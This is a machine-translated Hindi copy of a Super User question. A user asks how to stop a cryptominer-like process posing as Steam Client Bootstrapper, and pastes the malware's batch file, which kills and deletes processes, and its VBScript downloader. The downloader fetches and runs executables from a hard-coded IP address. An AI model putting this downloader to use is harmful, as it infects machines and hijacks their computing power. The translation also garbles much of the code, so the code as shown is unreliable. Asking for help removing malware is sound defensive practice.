विंडोज़ - स्टीम क्लाइंट बूटस्ट्रैपर को स्थायी रूप से कैसे मारें - सुपर यूजर

मेरे कार्य प्रबंधक में मेरी निम्न स्थिति है:

मेरे कार्य प्रबंधक में मेरी निम्न स्थिति है:

मुझे नहीं पता कि यह किस प्रकार का ऐप है, लेकिन निश्चित रूप से स्टीम क्लाइंट बूटस्ट्रैपर नहीं है क्योंकि मैंने इसे स्थापित नहीं किया है और इसे अनइंस्टॉल भी नहीं कर सकता।

अगर मैं यह पता लगाने की कोशिश करता हूं कि इस कदम के माध्यम से यह किस तरह का ऐप है:

मैं कुछ इस तरह से देखता हूं:

MS कॉन्फ़िग उपयोगिता में मुझे ऐसा कुछ नहीं मिला जो secury.exe जैसा दिखता है।

जब मैं फ़ाइल स्थान खोलता हूं, तो मुझे तीन फाइलें दिखाई देती हैं:

m.bat, b.exe, 4.vbs।

नीचे m.bat की सामग्री दी गई है:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer। f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs..exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe कार्यक्षेत्र / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrad.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls..exe टास्ककिल / f / t / im winlog.exe taskkill / f / t / im svchosts..exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts..exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: Windows / System32 \ soiuos.exe डेल C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ C ProgramData \ MSASCui.exe डेल सी: \ Pro gramData \ SystemSettlngs..exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData का WindowsUpgrad.exe del C: \ ProgramData \ msdc.exe। del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls..exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts..exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts..exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ पूल.exe del C: \ ProgramData \ pool2.exe डेल C: \ ProgramData \ pool3.exe

अगला जाता है 4.vbs:

सेट xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () SetGet = CreateObject ("ADODB.Stream") ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData's s2.exe", 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () सेट sGet = CreateObject ("ADODB.Stream") Jetet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell।") Run "C: \ ProgramData \ pool3.exe" CreateObject ()। "WScript.Shell")। "डेल सी: \ ProgramData \ pool3.exe" चलाएं

मैं अपने सर्वर की कंप्यूटिंग शक्तियों का दुरुपयोग करने से secury.exe को रोकने के लिए क्या कर सकता हूं?

PS मैंने अपने कंप्यूटर का अवास्ट पूरा चेक किया है, लेकिन इसमें कुछ भी गलत नहीं मिला।